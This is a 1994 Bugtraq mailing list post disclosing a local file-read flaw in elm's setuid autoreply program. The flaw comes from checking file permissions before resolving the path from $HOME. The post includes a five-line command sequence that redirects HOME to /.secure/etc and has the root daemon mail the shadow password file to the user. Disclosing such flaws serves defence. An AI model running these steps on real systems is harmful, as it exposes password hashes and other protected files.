Bugtraq mailing list archives
Another autoreply security hole
From: geiri () stud cs uit no (Geir Inge Jensen)
Date: Sat, 12 Mar 1994 11:04:12 +0100 (MET)
With all this talk about elms autoreply bug, I thought that I should take a look at the source. Wow, what am I seeing - yet another security hole. Simpler and less powerful than the other, but still - its there. It will take you a while to become root, but it is not impossible. Since most sysadms already have removed autoreply, I can's see no harm in posting it here. You can exploit the hole to read any file on the system! (Including /.secure/etc/passwd, /dev/kmem, etc). Autoreply takes a filename as an argument. Then it checks that the real uid have permissions to read the spesified file. Fine, a suid program should do just that. But then it does the fatal thing, it checks the filename if it has an / in front of it - and if it doesnt, autoreply do things the easy way. The program just reads the environment variable $HOME to find the full path of the file...! Have this been done before the test of readability, things would have been fine, but after.... Well, autoreply does'nt complain about the file, and since arepdaemon has to run as root, it can read any spesified file. Hence, you can do the following: # cd $HOME # echo x > passwd # export HOME=/.secure/etc # autoreply passwd # mail geiri < /dev/null And the file pops up in your inbox.... Bye, -- Greetings from the Northernmost University in the World ! To err is human, Geir Inge Jensen, University of Tromsoe, Norway ! to really foul up --------------------------------------------------------- ! requires the Internet: geiri () staff cs uit no Fidonet: 2:212/8.17 ! root password...
Current thread:
- Another autoreply security hole Geir Inge Jensen (Mar 12)